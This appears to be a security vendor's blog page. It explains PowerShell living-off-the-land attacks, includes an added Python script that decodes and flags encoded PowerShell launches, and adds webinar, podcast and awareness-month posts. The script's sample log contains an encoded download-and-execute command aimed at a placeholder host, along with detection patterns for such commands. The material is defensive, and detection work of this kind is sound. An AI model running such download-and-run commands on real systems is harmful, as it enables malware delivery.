Cybersecurity strategy resources helping organizations proactively defend against evolving threats.

Battling PowerShell Attacks with Cybersecurity Automation

By: Krystal Rennie, Director of Corporate Communications 

In today’s digital age, there are multiple ways that we use computer systems to carry out our everyday tasks. From accessing the internet to sending emails, we constantly build new automated routines for navigating the digital world. While this is normal behavior, it also leaves trails that cybercriminals can use against your organization.

According to Microsoft, PowerShell is “a cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework. PowerShell runs on Windows, Linux, and macOS.” It provides an interface for system administrators and users to carry out various tasks like running files, taking screenshots on the computer, accessing the internet, and more. 

This blog will explore how cybercriminals can use PowerShell, why PowerShell-based attacks are so hard to detect, and how you can ensure your organization remains vigilant against attackers.

PowerShell Attacks in Action   

To put it simply, PowerShell is a scripting language and shell installed on all Windows computers, so by default it is an easy entry point for cybercriminals to abuse: they do not have to bring their own tools. PowerShell is also used by system administrators to complete their tasks and is required for Windows to run, so it cannot be removed from Windows, as it is core functionality.

In practice, cybercriminals tend to abuse PowerShell because it lets them take full advantage of a living-off-the-land tactic. Malicious actors can use PowerShell to create a malware implant or to download and execute malware. Once they have access to your network, they can run commands and remain under the radar.

For example, an attacker can launch PowerShell through a simple spear phishing email that carries a PDF or Word document as an attachment. When the PDF or Word document is opened, the malicious code it contains finishes by triggering PowerShell to run. PowerShell then downloads the additional malware stages to infect the computer.

Cybercriminals do not go out of their way to reinvent the wheel when planning their attacks; where there is an easy point of entry, they will use it to their advantage. Opening an attachment is a common task for employees, and cybercriminals know that. Using familiar techniques like the above is a perfect way to lure in potential victims and gain access to organizational data.  

Why are PowerShell Attacks Difficult to Detect?  

As attackers advance their techniques, they also recognize that to maintain success, they must keep their tactics simple yet effective. Below are a few reasons PowerShell attacks are hard to detect: 

  1. Easy Access to Windows API: PowerShell allows cybercriminals to carry out automated tasks and everyday administrative tasks without having to worry about being blocked by an IT team, because it is a sanctioned administrative tool.
  2. Living-off-the-Land: PowerShell is a powerful command shell that can do whatever it is told. Cybercriminals use PowerShell as a native tool present on all Windows computers to advance their attacks. Using capabilities that are already part of the system lets cybercriminals do less prep work and execute more quickly.
  3. Hiding in Plain Sight: Cybercriminals will often encode their PowerShell commands so that they appear as a string of letters and numbers. Because the command must be decoded before it can be inspected, this hides malicious commands from security systems that only look at the raw command line.

Although detection can be tricky when looking at PowerShell as an attack method, with proper tools in place, such as an automated security solution with threat intelligence, it is not impossible. 

For example, Adlumin’s Threat Research team recently uncovered “PowerDrop,” a malicious PowerShell script that has set its sights on the U.S. aerospace industry. The malware uses advanced techniques to evade detection, such as deception, encoding, and encryption. The threat was detected by Adlumin’s machine learning-based algorithms, which analyze PowerShell commands and arguments at run-time. In essence, the malware is used to run remote commands against victim networks after the attacker has gained initial access, execution, and persistence on servers.

Implementing an automated security solution with a multi-layer detection approach is the key to successfully uncovering attackers’ actions in your network and protecting your organization before chaos hits. With the proper solution, malicious behavior can be detected, alerted on, and responded to in real time.
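The two detection points above (encoded commands that must be decoded before they can be inspected, and analysis of PowerShell command lines and arguments) can be demonstrated with a small log-scanning script. This is an added example, not Adlumin’s code and not the PowerDrop detection described in the post. The process-creation log format, the host and user names, the indicator lists and the scoring threshold are assumptions, and the sample log lines are constructed; the one real fact it relies on is that PowerShell’s -EncodedCommand value is base64 over UTF-16LE text.

```python
"""Detect and decode PowerShell -EncodedCommand launches in process-creation logs.

Added example, not Adlumin's code. The log line format is an assumption:
    <timestamp> host=<name> user=<name> cmdline=<full command line>
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts abbreviated parameter names, so an encoded launch can
# appear as -EncodedCommand, -enc, -ec or -e followed by the base64 blob.
ENCODED_FLAG = re.compile(
    r"(?i)(?:^|\s)-e(?:ncodedcommand|ncoded|nco|nc|n|c)?\s+([A-Za-z0-9+/=]{8,})"
)
# Launch switches that hide the session from the user (assumed indicator set).
LAUNCH_INDICATORS = {
    "hidden-window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no-profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
    "policy-bypass": re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass"),
}
# Strings in the decoded script that fit the download-and-execute pattern the
# post describes: fetch a further stage, then run it in memory.
CONTENT_INDICATORS = {
    "download": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient"),
    "dynamic-exec": re.compile(r"(?i)invoke-expression|\biex\b"),
    "nested-base64": re.compile(r"(?i)frombase64string"),
}
LOG_LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmdline=(?P<cmd>.*)$")
POWERSHELL_EXE = re.compile(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b")


@dataclass
class Finding:
    cmdline: str
    encoded: bool = False
    decoded: Optional[str] = None
    indicators: List[str] = field(default_factory=list)

    @property
    def score(self) -> int:
        # Encoding alone is weighted 2 because it defeats plain string matching.
        return (2 if self.encoded else 0) + len(self.indicators)

    @property
    def suspicious(self) -> bool:
        # Encoded launches are common in scheduled tasks, so require a
        # corroborating launch or content indicator before alerting.
        return self.score >= 3


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE text. Returns None when the blob is
    not valid base64 or not UTF-16LE, so the pipeline flags it instead of crashing."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmdline: str) -> Finding:
    finding = Finding(cmdline=cmdline)
    for name, pattern in LAUNCH_INDICATORS.items():
        if pattern.search(cmdline):
            finding.indicators.append(name)
    match = ENCODED_FLAG.search(cmdline)
    if match:
        finding.encoded = True
        finding.decoded = decode_encoded_command(match.group(1))
        if finding.decoded is None:
            finding.indicators.append("undecodable-payload")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    body = finding.decoded if finding.decoded is not None else cmdline
    for name, pattern in CONTENT_INDICATORS.items():
        if pattern.search(body):
            finding.indicators.append(name)
    return finding


def scan_log(lines) -> List[Finding]:
    """Return one Finding per PowerShell launch in the log; other processes are skipped."""
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if match and POWERSHELL_EXE.search(match.group("cmd")):
            findings.append(analyze_command_line(match.group("cmd")))
    return findings


def _b64_utf16(script: str) -> str:
    # Used only to build the constructed sample below; real logs already carry the string.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log; hosts, users and the URL are placeholders.
SAMPLE_LOG = [
    "2023-06-01T09:00:00Z host=ws01 user=admin cmdline=powershell.exe -File C:\\scripts\\inventory.ps1",
    "2023-06-01T09:05:00Z host=ws01 user=svc_backup cmdline=powershell.exe -EncodedCommand "
    + _b64_utf16("Get-Service -Name Spooler"),
    "2023-06-01T09:07:13Z host=ws02 user=jdoe cmdline=powershell.exe -nop -w hidden -enc "
    + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"),
    "2023-06-01T09:08:00Z host=ws02 user=jdoe cmdline=powershell.exe -ec notbase64!!",
    "2023-06-01T09:09:00Z host=ws03 user=asmith cmdline=notepad.exe C:\\notes.txt",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(("ALERT" if f.suspicious else "ok   "), f"score={f.score}", f.indicators)
        if f.decoded is not None:
            print("      decoded:", f.decoded)
```

Running the block scores the benign scripted launch and the benign encoded one-liner below the alert threshold, alerts on the hidden, profile-less encoded launch whose decoded body downloads and executes a second stage, and also alerts on the launch whose encoded value cannot be decoded, since a payload that will not decode is worth an analyst’s attention rather than a silent drop.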

Test Your Defenses: PowerShell Attack Simulator Tool 

Ensuring your organization has the proper tools and proactive measures to protect against PowerShell attacks is essential, and that includes testing your environment against PowerShell-based attacks. As automation, cybersecurity, and the digital landscape evolve, cybercriminals will only become more advanced in planning their attacks.

Adlumin has developed a free tool for security teams to test their defenses against common ways attackers gain access. PowerShell is a common tool attackers leverage to infiltrate an environment. The simulation runs through multiple ways PowerShell may be used maliciously so that you can gain visibility into your coverage against these threats.  

See how your security stands against the tactics and tricks used by cybercriminals. Download Adlumin’s free PowerShell Attack Simulator tool today or contact one of our cybersecurity experts for a demo and more information. 

Cyber Tide Season 1, Episode 4: Mark Sangster & Robert Darling Recap How Their Field Experience Shaped Their Ability to Deal with Cyber Crises, Cyber Crime, & More

In episode four of Cyber Tide, Mark Sangster, Chief of Strategy at Adlumin, and Robert Darling, Founder at Flash-EM, recap their experiences from RSAC 2023, how their experiences in the field have helped shape their abilities to deal with cyber crises, the scope of the problem of cybercrime, and more.

You can subscribe to CyberTide via Apple and Spotify.

About the Cyber Tide Series

Dive beneath the surface of infamous cybersecurity attacks to learn the means and motives of cyber adversaries. In each episode, we invite an expert to reveal the contributing factors and costs of cyber incidents and how your firm can protect itself from business-disrupting cyberattacks.

Cyber Tide Season 1, Episode 3: Three Lessons from Law Enforcement for Small to Medium-Sized Organizations

Adlumin co-hosts Mark Sangster, VP of Strategy, and Tim Evans, Co-founder and EVP, go below the headlines to learn from FBI veteran and EVP – CISO, John Caruthers at Triden Group.

John shares his experiences as a supervisory special agent focused on national cybersecurity, legal attaché to European police liaison, and his work supporting various businesses through cyberattacks. Sangster and Evans discuss his work in manufacturing, executive awareness training, and the lessons learned fighting state-sponsored actors.

Listen to Cyber Tide Episode 3

Local-Level Threats: Cybersecurity Strategies for Regional Businesses

Register for Adlumin’s Upcoming Webinar:

Local-Level Threats: Cybersecurity Strategies for Regional Businesses

Date: February 16, 2023
Time: 1:00 PM- 1:30 PM Eastern
Attendee Link: https://adlumin.com/webinar/local-level-threats-cybersecurity-strategies-for-regional-businesses/

Securing your infrastructure is a challenge for any business in 2023. Between the uncertainty of the current economic landscape and the difficulty of maintaining on-premise and cloud hybrid environments, cybersecurity teams must factor in a lot of moving parts. For regional businesses, the problems are often exacerbated by less-developed security strategies, limited resources — and a higher volume of cyberattacks. To protect against these digital threats, regional organizations must explore the right cybersecurity solution for their specific needs.

Security solutions that work for an enterprise-scale business are not always what’s best for regional companies. Join cybersecurity experts and enthusiasts from Adlumin and ESG as they uncover threats regional businesses should be paying attention to and outline how to find a Security Operations vendor that fits your architecture. Reserve your spot.

Tune in to learn:

  • What unique security challenges are plaguing regional-level organizations?
  • How do you conduct an internal security audit and pinpoint your Security Operations Platform needs?
  • What differentiates the Adlumin Platform?
  • Why are transparency, MDR Services, and live reporting important?

Navigating Strong Personalities: Effective Leadership in Cyber Crisis Management

By: Mark Sangster, Chief of Strategy

In a cyber crisis, who makes the decisions: The senior person? The technical expert? The self-appointed hero? When it comes to effective crisis leadership, removing emotion is critical. This guide identifies six personalities that emerge during a cyber crisis and how to harness challenging styles.

You’ll learn about the following personalities:

  • The Hero
  • The Martyr
  • The Hinderer
  • The Hoarder
  • The Captain

Harness Each Personality

Everyone metabolizes stress differently. To be the most effective leader during a cyber crisis, it is important to learn how to navigate the pitfalls of the human element. Quickly identifying learning types helps team leaders and executives assign specific members to the incident response team and assign responsibilities and tasks.

Download The Ultimate Guide to Managing Strong Personalities During a Cyber Crisis to learn how to manage these personalities properly.

Raising Awareness Through Cybersecurity Awareness Month (CAM)

By: Cybersecurity & Infrastructure Security Agency (CISA)

It’s October, so we are officially kicking off Cybersecurity Awareness Month (CAM). The annual initiative, driven by the Cybersecurity & Infrastructure Security Agency (CISA), is dedicated to raising awareness about the importance of prioritizing cybersecurity. This year’s overarching theme is “See Yourself in Cyber,” encouraging us all to actively recognize the roles we play in cybersecurity.

Cybersecurity has become one of the biggest hot topics inside and outside technology circles over the last two years. From securing learning devices due to a rise in digital learning during the COVID-19 pandemic to coping with the fallout of high-profile breaches of national infrastructure such as the Colonial Pipeline, there is a seemingly endless news cycle dedicated to cybersecurity mishaps and concerns.

And with this onslaught of negative news, it can be easy for everyday individuals to become overwhelmed and feel powerless in the face of the “insurmountable” threats posed by cybersecurity. But in actuality, nothing could be further from the truth.

With all the jargon typically thrown around in cybersecurity, there is a longstanding misperception that cybersecurity is beyond everyday people and that it should be left to professionals. Moreover, there is a prevailing sense among the public that breaches are simply a fact of life and that we should just learn to deal with them. But this just isn’t true. In fact, everyday people have a huge role to play in cybersecurity threat prevention, detection, and remediation. For example, according to IBM, 95% of breaches have human error as a main cause. Therefore, everyday technology users are very much the first line of defense when it comes to thwarting cybercrime. Unfortunately, though, many individuals are not aware of some of the best practices for boosting cybersecurity and how easy they are to use.

With that, here are a few key best practices that everyday people can implement today to enhance their own cybersecurity and create a more secure world for everyone.

  1. Watch Out for Phishing

    Phishing – when a cybercriminal poses as a legitimate party in hopes of getting individuals to engage with malicious content or links – remains one of the most popular tactics among cybercriminals today. In fact, 80% of cybersecurity incidents stem from a phishing attempt. However, while phishing has gotten more sophisticated, keeping an eye out for typos, poor graphics, and other suspicious characteristics can be a telltale sign that the content is potentially coming from a “phish.” In addition, if you think you have spotted a phishing attempt, report the incident so that internal IT teams and service providers can remediate the situation and prevent others from possibly becoming victims.

  2. Update Your Passwords and Use a Password Manager

    Having unique, long, and complex passwords is one of the best ways to boost your cybersecurity immediately. Yet, only 43% of the public say that they “always” or “very often” use strong passwords. Password cracking is one of the go-to tactics that cybercriminals turn to in order to access sensitive information. And if you are a “password repeater,” once a cybercriminal has hacked one of your accounts, they can easily do the same across all of your accounts. One of the biggest reasons that individuals repeat passwords is that it can be tough to remember all of the passwords you have. Fortunately, by using a password manager, individuals can securely store all of their unique passwords in one place, meaning people only have to remember one password. In addition, password managers are incredibly easy to use and can automatically plug in stored passwords when you visit a site.

  3. Enable MFA

    Enabling multi-factor authentication (MFA) – which prompts a user to input a second set of verifying information, such as a secure code sent to a mobile device, or to sign in via an authenticator app – is a hugely effective measure that anyone can use to drastically reduce the chances of a cybersecurity breach. In fact, according to Microsoft, MFA is 99.9 percent effective in preventing breaches. Therefore, it is a must for any individual that is looking to secure their devices and accounts.

  4. Activate Automatic Updates

    Making sure devices are always up to date with the most recent versions is essential to preventing cybersecurity issues from cropping up. Cybersecurity is an ongoing effort, and updates are hugely important in helping to address vulnerabilities that have been uncovered as well as in providing ongoing maintenance. Therefore, instead of trying to remember to check for updates or closing out of update notifications, enable automatic update installations whenever possible.